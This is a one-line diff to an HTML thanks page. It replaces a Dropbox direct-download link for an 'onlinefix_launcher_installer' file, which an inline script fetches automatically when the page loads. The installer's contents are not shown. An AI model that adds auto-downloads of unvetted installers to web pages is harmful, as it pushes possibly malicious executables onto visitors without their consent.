--- a/pages/ofmeThanks_en.html
+++ b/pages/ofmeThanks_en.html
@@ -68,7 +68,7 @@
         </div>
     </div>
     <script>
-        window.location.href = "https://www.dropbox.com/scl/fi/xhpdd1t0z4n1otoo3k7jz/onlinefix_launcher_installer?rlkey=dzqoc7c1zxgime7bdijb7yvdp&st=rl0cmz4f&dl=1";
+        window.location.href = "https://www.dropbox.com/scl/fi/nb6fuwtuhm5kr6hxu4krx/onlinefix_launcher_installer?rlkey=xwyz6uefj6q7xdh9v2u4gg3qk&st=613iquvb&dl=1";
     </script>
 </body>
 </html>
